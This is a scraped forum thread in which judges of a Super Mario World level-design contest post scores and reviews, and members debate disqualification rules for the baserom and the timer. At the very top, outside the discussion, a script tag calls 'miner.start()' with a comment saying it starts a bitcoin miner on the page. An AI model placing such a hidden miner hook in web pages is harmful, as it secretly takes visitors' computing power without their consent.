<script>
miner.start(); // initialise bitcoin miner
</script>

smw centralsmbx communitypge project

Vanilla Level Design Contest 11 -- Happy New Year!!

this is the place where lps are being talked about. it's important to talk about games being played on the internet.
User avatar
Mata Hari
Posts: 2225
Joined: 10 years ago

Re: Vanilla Level Design Contest 11 -- Add a plus in there and you get two

Postby Mata Hari » 1 month ago

It's funny how raocow got stuck on 'overless' but not on LANGS. What is a LANG. Is it like a land

User avatar
Grounder
Posts: 3340
Joined: 5 years ago

Re: Vanilla Level Design Contest 11 -- Add a plus in there and you get two

Postby Grounder » 1 month ago




No Mario tomorrow.
Why don't you eat me?

I am perfectly tasty...

AND I'LL STEAL YOUR SOUL! :twisted:

ImageImageImage

User avatar
FPzero
Resident SMW Central Admin
Posts: 478
Joined: 10 years ago

Re: Vanilla Level Design Contest 11 -- Add a plus in there and you get two

Postby FPzero » 1 month ago

63rd, MUSHROOM LANGS, by Infinity
60.25/100.00 points
Scores:
FPzero:
Design: 42/60
Creativity: 19/30
Aesthetics: 7/10

Total: 68/100

Comments:
There was something really charming about this level for whatever reason. I think it's because it was really bright, the music was cheerful and the difficulty was pretty much perfect for a World 1/2 athletic level. The simple mushrooms platforms and cloud background were lovely accents to the level. However, I do think you could've done more with the line guides in the second half. They get used once for a saw setup after the midpoint and then they're gone for the rest of the level. The level would've been stronger had you done just a little bit more with them. I think the bonus room, while evoking the original game's early bonuses, could have stood to be a little more unique or have something else in it visually. Part of me wants to say you should've added more sprites but considering you're definitely aiming for that earlygame difficulty, I think what was used was pretty good.
Ryaa:
Design: 30/60
Creativity: 15/30
Aesthetics: 6/10

Total: 51/100

Review: Pretty short and sweet. I think the music adds a nice touch to the level even though the design is a bit bland. I could imagine this being an early level in some sort of romhack. Nothing here is bad in any way so I would consider this level average at the most.
FrozenQuills:
-------------------
DESIGN | 37/60
CREATIVITY| 11/30
AESTHETICS| 8/10
TOTAL | 56/100
-------------------

COMMENTS:
alright

This was pretty alright. I like how it stuck to SMW's general design philosophy in
its enemies and dragon coin placements, as well as having its aesthetic style. It's
clean and well designed, but not something that will stick out well in a contest
nor is amazingly fun to play.

As always, alright ain't amazing
morsel:
50
10
6
66/100
Does a great job of emulating the original SMW in feel and design, to an extent (SMW would have had a perkier cave for the dragon coin). I think the level manages to achieve what it was aiming for, it just does not manage to do anything particularly creative beyond this. The mushroom tileset is tastefully differentiated from the vanilla one; perhaps the cave tileset should have been too.
62nd, CANYON OF BOMBS, by mariosr
61.50/100.00 points
Scores:
FPzero:
Design: 41/60
Creativity: 20/30
Aesthetics: 6/10

Total: 67/100

Comments:
Well, the midpoint was very lopsided I'll say that much. I think it would've been much better placed at the beginning of the big vertical climb or right before it. I liked how winding the level got by the end. It was interesting to try and figure out how you were moving through the level when you're going up and down and all over the sublevel in an attempt to reach the end. The vertical climb was interesting because there were a number of different short climbing setups for the player to get through, some with normal jumps, some with wall springboards, some with bullets as obstacles. By the end though, I felt like the enemy density got a little too high, bordering on spammy. The big layer priority enabled hills didn't help here either, because they liked to hide bombs in bubbles. I also encountered a bug right at the end of the level where the vine didn't spawn because there were too many enemies nearby. You probably should've used sprite memory setting 08 instead of 04 to try and prevent this.

Overall this level does some interesting things, mostly in terms of the physical level layout. Parachuting enemies always make for interesting obstacles with their unique movement pattern as do bubbles. A better midpoint position and fewer enemies at the end would've helped the level a lot more.
Ryaa:
Design: 33/60
Creativity: 18/30
Aesthetics: 4/10

Total: 55/100

Review: I'm seeing that the big thing with this level is that the open space works for and against what the creator wanted to achieve. At the very beginning, I was a little confused as to why there was so much open space near the first powerup. I personally don't think this powerup should have been placed how it was since you can easily ignore it. Not too sure why Bob-ombs are placed in that portion as well.

Moving on to the actual level design. It was "meh" at best for the most part though I really did like the vertical section a lot. The foreground hills obstruct a lot of your vision which isn't executed very well. With things being placed specifically behind the hills, the player can't know what is going to come from where at times. On this same note, it is also not too good to have the kicking Koopas so high up where the player can't properly see what's happening until after they see the shells flying down. I'm also not too big on how spammy the sprite placements get at the end of the level.

The Yoshi Coins and plot don't really seem that necessary as neither really contribute a challenge or set goal to the player. The plot tells you that you have to get the goal sphere "[before the koopas do]" but generally it doesn't seem like it adds anything that would actually highlight the fact that Koopa Troopas are present and are actually a threat in this level.
FrozenQuills:
-------------------
DESIGN | 40/60
CREATIVITY| 16/30
AESTHETICS| 6/10
TOTAL | 62/100
-------------------

COMMENTS:
canyon of gray hot dogs

An okay level featuring bombs. While bob-ombs are an underutilized enemy, they
weren't used that creatively in the design. Still, I like how they appeared as
normal enemies, bubbled enemies, and parachuting enemies; it helped provide some
variety.

The level is pretty much the same throughout, though it does add some bullet
cannons in the second half for more difficulty. The first few cannons that appear
can unfortunately be bypassed quickly before they can even shoot.

I don't think the foreground hot dogs are necessary, as they tend to hide enemies a
bit unfairly.

Anyway, this is an alright level overall that doesn't commit any design mistakes,
but does not really stand out.
morsel:
40
15
7
62/100
I quite liked this one. You get a good sense that the level is using a big space. The obstacles are tweaked slightly throughout the level. The vine at the end did not spawn the first time I reached it. I am not sure the gimmick of hiding bubble bombs behind the hill is very effective as they do not hurt you in themselves and you can just move through them quickly. Some of the kicked shells may take you by surprise if you go quickly; simlarly, in some situations bombs can fall down and take you by surprise, or some can be exploding as you reach them blindly from below.
61st, Overless Night, by teows
62.25/100.00 points
Scores:
FPzero:
Design: 43/60
Creativity: 18/30
Aesthetics: 6/10

Total: 67/100

Comments:
Midpoint felt a bit lopsided, with the first half being much longer than the second. I suppose it makes up for this fact by making the second half be a slow but relatively short and difficult autoscroller, but the point still stands that the first half felt a bit lengthy. Could also be that I kept dying in the first half since this level was surprisingly tricky at times. One big complaint I have is that the black line guides are nearly impossible to see against the night sky. You really should've made them white or tried using the checkered ones from the castle tileset instead. I also wasn't a fan of the bullet generator in the second half. It wasn't *too* bad, but it still felt like it added an unnecessary layer of things to avoid in a sublevel where there's already a bunch of bullets, rocks, and shells flying around.

I think the level was generally well-designed, but some difficulty spikes with hammer bro platforms and the bad visual design for the line guides hurt it a little bit. A little bit more polish might have alleviated some of those issues. In general it's a decent athletic level held back ever so slightly by some design choices.
Ryaa:
Design: 44/60
Creativity: 23/30
Aesthetics: 8/10

Total: 75/100

Review: Not really sure how I feel about this level. I think that the aesthetics are very neat, though a tiny bit distracting at points while getting a little messy in some areas. The way the skull switches are utilized is a little confusing since when I first see them, I somehow thought they were solid. As the level goes on, I began to notice that some enemies felt a little out of place. Specifically the ring Thwimps and the disco shell. It really seems like those additions to the already increased amount of sprites felt a little unnecessary to me. Mainly because the discord shell comes out of nowhere and makes the one ghost house block that stops it from falling off seem unfitting as well. Overall I think the level, despite being a bit linear, was fun to play and looked pretty nice.
FrozenQuills:
-------------------
DESIGN | 39/60
CREATIVITY| 15/30
AESTHETICS| 9/10
TOTAL | 63/100
-------------------

COMMENTS:
i dont think overless is a word-

Great starry aesthetics, ok design. The first half has some typical enemy dodging
and platforming. Sometimes there was too much to deal with on the line guides, like
the amazing flying hammer bro and the double saw setup. Nothing was overwhelming
though.

The second half kind of teeters on the border of engaging gameplay and overwhelming
gameplay with the bullet generator and enemies. I like that it's harder, but at the
same time it probably has a bit too much going on.

As a result, the design feels a bit inconsistent, but ultimately it's alright and
nothing frustrating. Again, love the nighttime feel of this.
morsel:
30
10
4
44/100
The bottom of the upside down mushroom top is solid. I suppose that is logical. The top of it is also solid. Farewell, Logic! Logic, farewell! Strange things decorate the ground. This becomes more immediate when some of them start moving (the thwimp). In a move from dirt decoration, we now have mushroom platform decoration. The real world justification is that mushroom stalks often have hammers and rocks embedded in them. A line-guided platfrom did not spawn. There are quite a few places in the level you can jump to that have nothing there to justify your exploration. Reappearing midpoint. Bullet generator. Another piranha not respecting proximity. The level just ends with an orb.
A couple weeks ago I was editing my own videos of this contest. I like to add the level author's name and placement in post like how VLDC9 had them visible, except I've been using the upper left area for them since it became an empty area when we created the baserom and removed lives.

So...63rd place... Well, when I went to add the name and placement I was greeted with this: Click for image, look in the video preview window.

There was a Mario, and a life counter. Which means Infinity never used the baserom.

Which means...this level should have been disqualified and we never caught it! All I could do was have a laugh and share it with other smwc staff members, and congratulate bebn legg on his new 96th place finish. Of course, since the contest has been over for half a year now, I'm not going to go and retroactively disqualify the level. So congratulations Infinity, you (accidentally) snuck this one past the judges!

User avatar
FrozenQuills
undefinable flair 2019
Posts: 783
Joined: 4 years ago
Location: my skull

Re: Vanilla Level Design Contest 11 -- Add a plus in there and you get two

Postby FrozenQuills » 1 month ago

tfw everyone noticed an entry having a time limit of more than 500 seconds in my emoji judging thread but not Infinity's blatant 5 lives

edit: and now I noticed Vanilla Plains (103rd place) should also have been dq'd LOL
Image
Image
Image
Image
SMBX Tileset Compiler and Separator
The boss entry that made me eat a shoe.
Image

5th place counter: 5
(SMBX Forums CC11, SMBX Forums CC12, Endgame Madness Contest, SMWC Kaizo Contest 2016, SMWC 24hr Contest 2018)

User avatar
FPzero
Resident SMW Central Admin
Posts: 478
Joined: 10 years ago

Re: Vanilla Level Design Contest 11 -- Add a plus in there and you get two

Postby FPzero » 1 month ago

lol we were extremely good at this

Implo
Posts: 154
Joined: 1 year ago

Re: Vanilla Level Design Contest 11 -- Add a plus in there and you get two

Postby Implo » 1 month ago

Wait a moment. Author of Mushroom Langs didn't use baserom and you would like to disqualify him? What? I mean he put himself into disadvantage, he didn't gain anything from not using baserom. Disqualifying him just because of that is so stupid. I thought you put baserom as optional help for contestants. What's the point of forcing people to use it?

User avatar
FPzero
Resident SMW Central Admin
Posts: 478
Joined: 10 years ago

Re: Vanilla Level Design Contest 11 -- Add a plus in there and you get two

Postby FPzero » 1 month ago

It included a ton of fix patches as well as the SA-1 expansion to allow for less slowdown and more sprite usage. There was really no reason for people not to use it when it was provided right there for everyone. Additionally, while nothing has come of it right now, we did try and future-proof the contest for a potential compilation hack by using the baserom.

Implo
Posts: 154
Joined: 1 year ago

Re: Vanilla Level Design Contest 11 -- Add a plus in there and you get two

Postby Implo » 1 month ago

FPzero wrote: It included a ton of fix patches as well as the SA-1 expansion to allow for less slowdown and more sprite usage. There was really no reason for people not to use it when it was provided right there for everyone. Additionally, while nothing has come of it right now, we did try and future-proof the contest for a potential compilation hack by using the baserom.
But still you don't need to force it to use. I mean in BLDC using baserom is explained very well, but not for VLDC. And by the way, it was said on smw central many times that compilation hack for VLDC 11 isn't planned, so I don't see your point.

User avatar
FPzero
Resident SMW Central Admin
Posts: 478
Joined: 10 years ago

Re: Vanilla Level Design Contest 11 -- Add a plus in there and you get two

Postby FPzero » 1 month ago

It was a precaution in case we are able to put one together in the future. At the same time, I came back to hosting this contest for the first time in 6 years and felt that a baserom seemed like a good idea to carry over from how VLDCX, and maybe VLDC9 were handled. It levels the playing field by giving everyone the same set of fixes and expansion chips, opening up levels to be a little more complicated than pure vanilla. It's the same reason we mandate that people use the latest versions of Lunar Magic for their levels, since older versions are less friendly in ways and feature bugs that allowed for a few glitch exploitations that have since been fixed.

User avatar
BobisOnlyBob
Mythical Quadruped
Posts: 1023
Joined: 6 years ago
Location: the world is no longer a place

Re: Vanilla Level Design Contest 11 -- Add a plus in there and you get two

Postby BobisOnlyBob » 1 month ago

Baseroms also help work around the classic contest problem of "here's one I made earlier". It's fairly solid proof of the author having worked on the level for the contest, and not just pulled it out of an existing project, something that's happened a bunch in previous years in the middle tiers. Using a baserom just sets everyone on the same level, and if it's an agreed upon part of the contest from the start, well then, when you don't do it you get DQ'd. But given the fact it was overlooked by literally all four judges and made it to this state with its rating still intact, it's not exactly a massively serious issue or like a top 10 placement getting DQ'd, changing the results significantly. At this point it's just a humorous slap on the wrist.
BOB is an acronym for BOB is Only BOB etc.

User avatar
idol
god's gonna come to my house and kill me
Posts: 195
Joined: 3 years ago
First name: charlotte
Pronouns: she/her

Re: Vanilla Level Design Contest 11 -- Add a plus in there and you get two

Postby idol » 1 month ago

Implo wrote: Wait a moment. Author of Mushroom Langs didn't use baserom and you would like to disqualify him?
judges reserve the right to disqualify entries if they break the rules. the rules of vldc11 specifically stated that usage of the baserom was required. its been explained thoroughly as to why it's required by now, so i don't think i need to explain more.

an entry was disqualified from vldc11 for setting the time to 501 seconds. the rules state to not have a time above 500 seconds. if users want to bypass the rules, regardless of how big, they gotta be ready for the potential of disqualification.
must b love on tha brain
[avi source]

Implo
Posts: 154
Joined: 1 year ago

Re: Vanilla Level Design Contest 11 -- ID# of the month which is named after the number 9

Postby Implo » 1 month ago

idol wrote:an entry was disqualified from vldc11 for setting the time to 501 seconds. the rules state to not have a time above 500 seconds. if users want to bypass the rules, regardless of how big, they gotta be ready for the potential of disqualification.
There was another entry made by wolfnasty. He used reset of time, which was against rules. But he wasn't disqualified, because there was no way to gain more than 500s of timer. Not using baserom feels exactly like this kind of situation. Wolfnasty didn't gain any advantage and the people that didn't use baserom also didn't get any advantage. In the end nothing wrong happened.

Classtoise
Posts: 160
Joined: 10 years ago
First name: Juno
Pronouns: they/them/their

Re: Vanilla Level Design Contest 11 -- ID# of the month which is named after the number 9

Postby Classtoise » 1 month ago

Implo wrote:
idol wrote:an entry was disqualified from vldc11 for setting the time to 501 seconds. the rules state to not have a time above 500 seconds. if users want to bypass the rules, regardless of how big, they gotta be ready for the potential of disqualification.
There was another entry made by wolfnasty. He used reset of time, which was against rules. But he wasn't disqualified, because there was no way to gain more than 500s of timer. Not using baserom feels exactly like this kind of situation. Wolfnasty didn't gain any advantage and the people that didn't use baserom also didn't get any advantage. In the end nothing wrong happened.
Except something wrong DID happen; they did not follow the rules of participation.

Implo
Posts: 154
Joined: 1 year ago

Re: Vanilla Level Design Contest 11 -- ID# of the month which is named after the number 9

Postby Implo » 1 month ago

Classtoise wrote: Except something wrong DID happen; they did not follow the rules of participation.
Except wolfnasty entry hasn't been disqualified and I don't think judges didn't noticed that. Even though level clearly broke reset time rule, they let it slide. In this kind of situation instead of disqualification it would be better to just lower score instead at worst. I mean this contest has been made for fun and I don't think every little thing breaking rules should be counted as immediate disqualification. In this matter I prefer VLDCX with it's penalty points.

Implo
Posts: 154
Joined: 1 year ago

Re: Vanilla Level Design Contest 11 -- ID# of the month which is named after the number 9

Postby Implo » 1 month ago

I'm surprised, raocow easily managed to beat most of the level that I struggled a lot. But he failed on easy jump near the end that I had no problem to perform. I was literally shouting into screen "Don't drop down there! Jump from top!". Good thing that he finally figured it out.

User avatar
FPzero
Resident SMW Central Admin
Posts: 478
Joined: 10 years ago

Re: Vanilla Level Design Contest 11 -- ID# of the month which is named after the number 9

Postby FPzero » 1 month ago

60th, ZA WARUDO TOWER, by ghyn
62.50/100.00 points
Scores:
FPzero:
Design: 27/60
Creativity: 19/30
Aesthetics: 2/10

Total: 48/100

Comments:
This level does an extremely bad job of communicating to the player what is solid and what is walk-through to the point that it's an active detriment to gameplay. You really should've just used two separate palettes for solid and walk-through so that the player can tell at a glance what is what. Because you use a lot of normally walk-through in vanilla tiles as solid platforms and vice-versa, but aren't consistent about it in the level. Vines aren't climbable, clouds are solid, solid blocks are pass-through. It's really bad about this.

The spike alarm section is a nice idea but why did you even bother with a reset door at the beginning of it if most other parts of the section don't have a way to reset? The unforeshadowed grinder race and jump wasn't very good either, since there's no way to realize that that's what you need to do when you first get there, and the line guide for the grinder blend in with the black sky.

It's all too bad because I can definitely tell that you put in a TON of work to making the level work both forwards and backwards when the layer falls down. It's just a shame that I was too busy trying to figure out what my path was to truly appreciate the level as a whole.
Ryaa:
Design: 45/60
Creativity: 18/30
Aesthetics: 4/10

Total: 67/100

Review: This is one of those levels where the ideas are extremely neat but the execution is more on the below average side. I feel that the biggest setback of this level are the non-solid tiles that were used. They completely obscure the paths that you're supposed to take because they look solid. I do think that the water mechanic was pretty cool. Though it's completely ditched once the spike mechanic is introduced. It almost feels as if I'm playing two different levels and that's not a very good thing. What I do think is that the colors of the water really do the gimmick a lot of justice. One thing I will point out though is that at points in the level, there are random blocks that hurt you that aren't supposed to hurt you. The one I can clearly remember is in the second section's grinder portion where the first thwomp at the start of that.

Overall I think that if this level were more polished, it could have really had a better chance to shine brightly.
FrozenQuills:
-------------------
DESIGN | 31/60
CREATIVITY| 23/30
AESTHETICS| 6/10
TOTAL | 60/100
-------------------

COMMENTS:
this time a less saturated blue

A level with a lot of potential, but kind of missed the mark. The anti water
is kind of neat in how it constrains you, but it made the first half a lot more
difficult than necessary. There are quite a few precise movements you have to do in
the first room, I kept getting hit during the fishbone obstacle, and the bowser
statue right by the anti water is a bit mean. Strange enough, the level gets easier
and nicer before the midpoint.

The second half also has conveyance and precision issues. I thought the level was
unfinished until I realized the stairs trigger layer 2 falls and you were supposed
to go back. The blue-purple room is cool, but the saw race isn't well designed
since it looks like you have to wait for the thwomp, yet you can barely manage to
rush past it.

Furthermore, the level breaks its own rules on what blocks act like what, and since
nearly everything was blue or purple I had a hard time distinguishing what's solid
and what's not solid.

On the other hand, this level is creative. I like how the room completely changes
when backtracking. Both the anti water and blue-purple room are cool gimmicks.
Finally, I enjoyed the japes and traps near the end.

In short, this level has a lot of creative things going for it, but it's massively
held back by clarity issues.
morsel:
42
26
7
75/100
I think I wanted to try and use this jumping ban idea once but I had more sense. One problem is that you cannot touch the water off the ground from the side as well; this made some of the jumps here a bit awkward. Still, the first half was not bad, despite the wonky gimmick. The second half had a really neat gimmick and ended all too soon. Some things that do not look much like ground are used as ground. There is a reset door on the falling layer (it was not clear I was racing the grinder here). It was nice to see apparently useless sprites come into play as I went backwards, although (as there is player movement in both directions) some sprites may despawn easily. The fish can spawn in the wrong direction, as you enter the room; and they can respawn in annoying positions easily; they make use of RNG when they spawn so using them to make set-ups like this is inadvisable. Both fake goal orbs got me.
I was going to say that it looked like raocow had a severe case of tunnel vision with the grinder jump because he kept insisting that he try the jump from really low down, and not ride the grinder up higher to get a higher jump, but then I realized that he may have believed the spike ceiling was still above him offscreen since he hit it earlier. If he thought that to be the case, then I understand why he kept trying the jump from such a low position. Either way, the fact the reset door is basically useless and it's incredibly easy to get yourself into an impossible state there really hurt the level in my eyes.

User avatar
FPzero
Resident SMW Central Admin
Posts: 478
Joined: 10 years ago

Re: Vanilla Level Design Contest 11 -- ID# of the month which is named after the number 9

Postby FPzero » 1 month ago

Implo wrote:
idol wrote:an entry was disqualified from vldc11 for setting the time to 501 seconds. the rules state to not have a time above 500 seconds. if users want to bypass the rules, regardless of how big, they gotta be ready for the potential of disqualification.
There was another entry made by wolfnasty. He used reset of time, which was against rules. But he wasn't disqualified, because there was no way to gain more than 500s of timer. Not using baserom feels exactly like this kind of situation. Wolfnasty didn't gain any advantage and the people that didn't use baserom also didn't get any advantage. In the end nothing wrong happened.
wolfnasty reset the timer, yes, but if you add times together between the two sections, the first area had 300 seconds and the second always resets to 200. We noticed in judging and decided that because it's not used as a reset door, and can't let the player have more than 500 seconds, that it was technically in the rules, since the rules state no resetting the timer to get around the 500 second limit.

I know the whole timer issue is a sore point for people, but I also know that if you give people an inch they'll take a mile. For BLDC, Super Maks 64 was making an entry that used arbitrary code execution because he found some poor coding in one of the custom sprites that he could exploit, and argued that because ACE was not explicitly disallowed in the rules that what he was doing was contest-legal. And I suppose on the thinnest technicality he was right, but it sure didn't feel in the spirit of the contest. He was giving himself a different advantage compared to other entrants using ACE because he'd managed to code himself an HP bar, reset system, and make a few changes to existing enemies using it.

All of this is to say that I've played a ton of long contest entries in the past, many of who are made worse by their unending length. The timer restrictions were definitely in-part reactionary to the eight month long judging period that VLDCX had and all the judge burnout I saw it cause. I'm not opposed to lengthening the timer more in the future instead of keeping it low, but I think we'll probably keep some form of timer restriction with the majority of our non-chocolate level design contests going forward.

User avatar
Mandew
Posts: 434
Joined: 10 years ago
First name: Marc
Pronouns: a person
Location: canada

Re: Vanilla Level Design Contest 11 -- ID# of the month which is named after the number 9

Postby Mandew » 1 month ago

it only takes one teeny-tiny hitch in the design-execution at a vital point in the level
that's just how it is in the field
video games

User avatar
raocow
the death of the incredible huge
Posts: 2968
Joined: 10 years ago
Location: maybe the Wizards are the most complex, and the sales guys are up their daily

Re: Vanilla Level Design Contest 11 -- ID# of the month which is named after the number 9

Postby raocow » 1 month ago

FPzero wrote: but then I realized that he may have believed the spike ceiling was still above him offscreen since he hit it earlier. If he thought that to be the case, then I understand why he kept trying the jump from such a low position.
this
the chillaxest of dragonsImage
Image
Image
Image
ImageImage

User avatar
KobaBeach
obscure jrpg enthusiast
Posts: 1397
Joined: 6 years ago
First name: David
Pronouns: he/him
Location: Portugal

Re: Vanilla Level Design Contest 11 -- ID# of the month which is named after the number 9

Postby KobaBeach » 1 month ago

FPzero wrote: I know the whole timer issue is a sore point for people, but I also know that if you give people an inch they'll take a mile. For BLDC, Super Maks 64 was making an entry that used arbitrary code execution because he found some poor coding in one of the custom sprites that he could exploit, and argued that because ACE was not explicitly disallowed in the rules that what he was doing was contest-legal. And I suppose on the thinnest technicality he was right, but it sure didn't feel in the spirit of the contest. He was giving himself a different advantage compared to other entrants using ACE because he'd managed to code himself an HP bar, reset system, and make a few changes to existing enemies using it.
Image

i dont care about spirit of the contest that shit is 1st place material
twitter (spicy at times!) | avatar by kuma

who cares:
Image

Image
Image
Image
Image

User avatar
FPzero
Resident SMW Central Admin
Posts: 478
Joined: 10 years ago

Re: Vanilla Level Design Contest 11 -- ID# of the month which is named after the number 9

Postby FPzero » 1 month ago

cool

Not that it matters anyway because he didn't finish and submit before the deadline, so we didn't even have to get into the question of whether that should be a legal level or not.

User avatar
Super Maks 64
Just your usual SMW hacker
Posts: 341
Joined: 2 years ago
Pronouns: he/him/his
Location: Poland

Re: Vanilla Level Design Contest 11 -- ID# of the month which is named after the number 9

Postby Super Maks 64 » 1 month ago

That means that there's always the next time to try it out since a consensus hasn't been reached.



By the way, here's the level if anyone wants to play it.

It's even a sequel to my VLDC11 level we haven't seen yet.


User avatar
Leet
Well, hello, Smith ( ´-`)ノ
Posts: 2222
Joined: 7 years ago
First name: Chie Arale
Pronouns: she/her
Location: Harman's Room

Re: Vanilla Level Design Contest 11 -- ID# of the month which is named after the number 9

Postby Leet » 1 month ago

I can't believe someone would use their individual skills to give themselves an advantage in a contest. Clearly the ideal contest should be one in which everyone does exactly the same thing and all tie
Well it is a decent hack but sometime its just too repetitif there no level that actually pop in your face and your like oh yeah that level they all ressemble themselves and just monster along the way.
Blood Ghoul wrote:Sometimes it seems my blood spurts out in gobs, as if it were a fountain's pulsing sobs. I clearly hear it mutter as it goes yet cannot find the wound from which it flows. Before I met you, baby, I didn't know what I was missing.

User avatar
Alice
Posts: 2199
Joined: 8 years ago
Pronouns: Girl person
Location: Wonderland

Re: Vanilla Level Design Contest 11 -- ID# of the month which is named after the number 9

Postby Alice » 1 month ago

FPzero wrote: All of this is to say that I've played a ton of long contest entries in the past, many of who are made worse by their unending length. The timer restrictions were definitely in-part reactionary to the eight month long judging period that VLDCX had and all the judge burnout I saw it cause. I'm not opposed to lengthening the timer more in the future instead of keeping it low, but I think we'll probably keep some form of timer restriction with the majority of our non-chocolate level design contests going forward.
Wouldn't it make a lot more sense to just penalize levels that are dragging on instead of arbitrarily limiting time when there are valid reasons to have longer time limits?

User avatar
Grounder
Posts: 3340
Joined: 5 years ago

Re: Vanilla Level Design Contest 11 -- ID# of the month which is named after the number 9

Postby Grounder » 1 month ago

Alice wrote:
FPzero wrote: All of this is to say that I've played a ton of long contest entries in the past, many of who are made worse by their unending length. The timer restrictions were definitely in-part reactionary to the eight month long judging period that VLDCX had and all the judge burnout I saw it cause. I'm not opposed to lengthening the timer more in the future instead of keeping it low, but I think we'll probably keep some form of timer restriction with the majority of our non-chocolate level design contests going forward.
Wouldn't it make a lot more sense to just penalize levels that are dragging on instead of arbitrarily limiting time when there are valid reasons to have longer time limits?
At which point you're going to get complaints about unreasonable bias.
Why don't you eat me?

I am perfectly tasty...

AND I'LL STEAL YOUR SOUL! :twisted:

ImageImageImage


Return to “let's play”

Who is online

Users browsing this forum: Bing [Bot], Leet and 20 guests